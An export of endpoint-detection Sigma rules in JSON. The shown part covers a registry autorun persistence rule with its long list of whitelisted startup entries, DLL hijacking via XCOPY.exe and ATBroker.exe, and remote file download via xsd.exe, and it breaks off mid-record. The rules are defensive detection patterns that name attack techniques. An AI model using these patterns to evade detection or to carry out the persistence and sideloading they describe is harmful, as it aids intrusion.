TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\com.squirrel.cliq.cliq'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\com.doko.winx\\doko-phone.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\doko-phone'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\ecosiabrowser\\application\\ecosiabrowser.exe\" --no-startup-window /prefetch:5'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\googlechromeautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\element-desktop\\update.exe\" --processstart \"element.exe\" --process-start-args \"--hidden\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\element'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\episoftware\\epibrowser\\application\\epibrowser.exe\" --from-registry'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\epibrowserstartup'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\episoftware\\epibrowser\\application\\epibrowser.exe\" --no-startup-window --existing-window /prefetch:5'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\epibrowserautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\episoftware\\epibrowser\\application\\epibrowser.exe\" --update'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\epibrowserupdate'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\fenetre\\fenetre capture tool\\fenetrecapturetool.exe /startminimized'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\fenetrecapturetool'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\fingerprint\\fingerprint-fde\\myistra\\myistra.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\myistra'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\gamejoltclient\\gamejoltclient.exe\" run -- --silent-start'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\gamejoltclient'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\google\\update\\\\*\\googleupdatecore.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\google update'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\hubone\\hubonepp\\mycallpp\\mycallpp.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\mycallpp'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\mathworks\\servicehost\\v*\\bin\\win64\\matlabconnector.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\matlab connector'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\microsoft\\edge dev\\application\\msedge.exe\" --no-startup-window --win-session-start'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\microsoftedgeautolaunch_*'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\mixesoft\\appnhost\\appnhost.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\appnhost'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\nordvpn\\updates\\channel-*\\\\*\\\\*.exe /silent /verysilent'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Runonce\\nordvpn update'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\onelaunch\\\\*\\chromium\\chromium.exe\" --no-startup-window /prefetch:5'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\googlechromeautolaunch_*'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\onelaunch\\\\*\\onelaunch.exe /startedfrom=registry'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onelaunch'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\onelaunch\\\\*\\chromiumstartupproxy.exe--tab-trigger=systemstart'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onelaunchchromium'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\oneop\\gto_fde\\oneapp\\oneapp.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\oneapp'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\onestart.ai\\onestart\\application\\onestart.exe\" --existing-window'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onestartchromium'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\onestart.ai\\onestart\\application\\onestart.exe\" --no-startup-window --from-registry /prefetch:5'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onestartautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\onestart.ai\\onestart\\application\\onestart.exe\" --update'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onestartupdate'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\artlist\\artlist hub.exe --hidden'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\electron.app.artlist hub'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\programs\\authenticator ?\\authenticator ?.exe\" --hidden'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\authenticator 6'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\curseforge windows\\curseforge.exe --minimized'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\electron.app.curseforge'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\doctolib\\doctolib.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\com.doctolib.pro.desktop'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\programs\\lively wallpaper\\lively.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\lively'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\programs\\module coliship\\module coliship.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\module coliship'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\monsisra2\\monsisra2.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\monsisra'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\monsisraapp\\monsisra2.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\monsisra'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\monsisra\\monsisra2.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\monsisra'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\opera gx\\opera.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\opera gx stable'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\parceo-discussions-app\\parceo-discussions.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\parceo-discussions'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\ringover\\resources\\app.asar'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ringover'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\ringover\\ringover.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ringover'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\spico-discussions-app\\spico-discussions.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\spico-discussions'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\tldv\\tldv.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\electron.app.tldv'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\twinkle-tray\\twinkle tray.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\electron.app.twinkle tray'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\wazo\\wazo desktop.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\wazo.client.desktop'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\programs\\zalo\\zalo.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\zalo'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\shift\\chromium\\shift.exe\" --launch-source=sign-in'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\shiftautolaunch_*'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\spark\\spark.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\spark'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\tel4b\\production\\myistra\\myistra.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\myistra'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\webex\\ciscowebexstart.exe\" /daemon /from=autorun'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ciscomeetingdaemon'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\webex\\webexhost.exe\" /daemon /from=autorun'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ciscomeetingdaemon'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\webex\\webexhost.exe\" /daemon /runfrom=autorun'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ciscomeetingdaemon'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\xivo-desktop-assistant\\update.exe\" --processstart \"xivo-desktop-assistant.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\xivo-desktop-assistant'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\xivo-desktop-assistant\\xivo-desktop-assistant.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\xivo-desktop-assistant'\n - Details: '\"?:\\Users\\\\*\\AppData\\Roaming\\adobe\\connect\\connectdetector.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\connectdetector'\n - Details: '?:\\Users\\\\*\\AppData\\Roaming\\asus\\smartkvm1591\\functmodules\\{*}\\smartdata.exe -gn:runfromregistry -gs* -gs:apploaderexename:smartkvm.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\cs dispatch'\n - Details: '?:\\Users\\\\*\\AppData\\Roaming\\spotify\\spotify.exe --autostart --minimized'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\spotify'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\wazo\\wazo desktop.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\wazo.client.desktop'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\wazo\\wazo desktop.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\wazo.client.desktop'\n - Details: '?:\\Users\\\\*\\downloads\\unikey*\\unikeynt.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\unikey'\n - Details: '\"?:\\Users\\\\*\\mon-assistant-marche-public\\mon assistant marches publics.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\mon assistant marches publics'\n - Details: '?:\\windows\\explorer.exe me.blueone.win:noopt:hidden'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\bluemail'\n - Details: '?:\\windows\\temp\\tcagentcleanup_logicnow.exe /instance _logicnow'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Runonce\\basupsrvcuninstallcomplete_logicnow'\n - Details: '?:\\windows\\temp\\tcagentcleanup_n-central.exe /instance _n-central'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Runonce\\basupsrvcuninstallcomplete_n-central'\n - Details: '?:\\windows\\twain_32\\brims???\\common\\twdsuilaunch.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\s???'\n - Details: '?:\\windows\\twain_32\\fjicube\\fjtwmkic.exe /station'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\fjtwainic setup'\n - Details: '?:\\windows\\twain_32\\fjicube\\icwiachecker.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\icwia service checker'\n - Details: '?:\\windows\\twain_32\\fjscan32\\sop\\ftlnsop.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\ftlnsop_setup'\n - Details: 'devdetect.exe -autorun'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\device detector'\n - Details: '\"*\\rca\\rcasuite\\rcasuite.exe\" /minimize'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\rca suite'\n - Details: 'philipsspeechdriverconfiguration.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\philipsspeechdriverconfiguration'\n - Details: 'pspcontr.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\pspcontr'\n - Details: 'regedit.exe /s ?:\\ProgramData\\mo\\mo-dict.reg'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\mo_dict'\n - Details: 'reg.exe delete hklm\\system\\controlset001\\services\\basicdisplay /v acceleration.level /f'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\Currentversion\\Runonce\\bomgar hardware acceleration restore [\\device\\video*]'\n - Details: '*\\inot.san\\i-not\\cti\\cti.bat'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\cti'\n - Details: '%windir%\\azurearcsetup\\systray\\azurearcsystray.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\Currentversion\\Run\\azurearcsetup'\n - Details: 'cmd /c REG ADD ?HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Search? /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\SearchboxTaskbarMode'\n - Details: 'cmd /c REG ADD ?HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced? /v TaskbarMn /t REG_DWORD /d 0 /f'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\TaskbarMn'\n - Details: '?:\\WINDOWS\\Microsoft.NET\\Framework\\v*\\netfxupdate.exe? 0 v* GAC + NI NID'\n TargetObject: 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NetFxUpdate_v*'\n - Details: '?:\\ProgramData\\Package Cache\\{????????-????-????-????-????????????}\\CybereasonSensor.exe? /uninstall /quiet /NoRestart'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!UninstallOldCrSensor.{????????-????-????-????-????????????}'\n - Details: '?:\\Windows\\Temp\\MUBSTemp\\BCILauncher.exe bgaupmi=????????????????????????????????'\n TargetObject: 'HKU\\\\*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!BCILauncher'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\Programs\\Authenticator ?\\Authenticator.exe? --hidden'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Authenticator'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\ScreenCast\\Upgrade.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Upgrade'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\Suuntolink\\app-*\\resources\\app\\LaunchAgents\\SuuntolinkLauncher.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SuuntolinkLauncher'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "970dca0d-7bda-4ab7-a60c-a23fa59e6627",
"rule_name": "Registry Autorun Key Added",
"rule_description": "Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\nAutostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\nIt is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9711dafd-3fde-40dd-9d4d-7804b4b4fa07",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601429Z",
"creation_date": "2026-03-23T11:45:34.601433Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601440Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_xcopy.yml",
"content": "title: DLL Hijacking via XCOPY.exe\nid: 9711dafd-3fde-40dd-9d4d-7804b4b4fa07\ndescription: |\n Detects potential Windows DLL Hijacking via XCOPY.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'XCOPY.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9711dafd-3fde-40dd-9d4d-7804b4b4fa07",
"rule_name": "DLL Hijacking via XCOPY.exe",
"rule_description": "Detects potential Windows DLL Hijacking via XCOPY.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "971e1089-25f4-4f7c-871c-3d7c3abefabb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082740Z",
"creation_date": "2026-03-23T11:45:34.082742Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082747Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_xsd_lolbas_tool_transfer.yml",
"content": "title: File Downloaded via xsd.exe\nid: 971e1089-25f4-4f7c-871c-3d7c3abefabb\ndescription: |\n Detects a suspicious execution of the xsd.exe executable to download a remote file.\n The downloaded file is saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\n Adversaries may transfer tools or other files to a compromised environment using legitimate tools to evade detection.\n It is recommended to check the content of the downloaded file and look for other suspicious behavior in the user's session.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/12/06\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Xsd\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exe_image:\n - Image|endswith: '\\xsd.exe'\n # Renamed binaries\n - OriginalFileName: 'xsd.exe'\n\n selection_cmdline:\n CommandLine|contains:\n - 'http'\n - 'ftp://'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "971e1089-25f4-4f7c-871c-3d7c3abefabb",
"rule_name": "File Downloaded via xsd.exe",
"rule_description": "Detects a suspicious execution of the xsd.exe executable to download a remote file.\nThe downloaded file is saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\nAdversaries may transfer tools or other files to a compromised environment using legitimate tools to evade detection.\nIt is recommended to check the content of the downloaded file and look for other suspicious behavior in the user's session.\n",
"rule_creation_date": "2024-12-06",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9742d744-56b7-4e82-b4a6-5c27217bec3a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081916Z",
"creation_date": "2026-03-23T11:45:34.081918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081923Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_atbroker.yml",
"content": "title: DLL Hijacking via ATBroker.exe\nid: 9742d744-56b7-4e82-b4a6-5c27217bec3a\ndescription: |\n Detects potential Windows DLL Hijacking via ATBroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ATBroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9742d744-56b7-4e82-b4a6-5c27217bec3a",
"rule_name": "DLL Hijacking via ATBroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ATBroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "974dd9cb-ae25-42fd-972c-3f04914794a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
